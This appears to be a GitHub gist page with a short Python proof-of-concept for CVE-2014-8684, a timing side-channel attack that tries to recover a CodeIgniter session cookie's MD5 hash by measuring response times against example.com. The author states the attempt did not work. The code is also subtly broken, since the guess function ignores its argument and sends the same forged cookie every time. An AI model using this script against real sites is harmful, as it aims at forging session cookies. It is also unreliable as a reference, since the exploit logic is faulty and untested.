Created
April 25, 2022 21:01
-
-
Save meme-lord/e15f9914f82aecf449b818f228592efa to your computer and use it in GitHub Desktop.
attempt at poc for CVE-2014-8684. It did not work
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2014-8684 testing | |
| # it was not successful on my target so did not do work past the bare testing stage | |
| # network variance was more than the timing difference in length | |
| import requests | |
| import time | |
| # Can't use elapsed from requests as it stops as soon as first byte of response is received not when response is complete | |
| r = requests.get("https://example.com/login") | |
| valid_cookie = r.cookies['ci_session'] | |
| valid_hash = valid_cookie[-32:] | |
| obj = valid_cookie[:-32] | |
| empty_hash = '0'*32 | |
| jar = r.cookies | |
| print(f"Actual md5: {valid_hash}") | |
| chars = "abcdef0123456789" | |
| def guess(hash): | |
| jar.set('ci_session', f"{obj}{valid_hash[:31]}0", domain='example.com', path='/') | |
| total = 0 | |
| attempts = 100 | |
| for i in range(attempts): | |
| start = time.time() | |
| r = requests.get("https://example.com/login", cookies=jar) | |
| end = time.time() | |
| total+=end-start | |
| print(f"{hash} : {total/attempts}") | |
| return total/attempts | |
| leader = 0 | |
| answer = "00" | |
| for i in chars: | |
| for j in chars: | |
| result = guess(f"{i}{j}{'0'*30}") | |
| if result>leader: | |
| leader=result | |
| answer = f"{i}{j}" | |
| print(answer) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment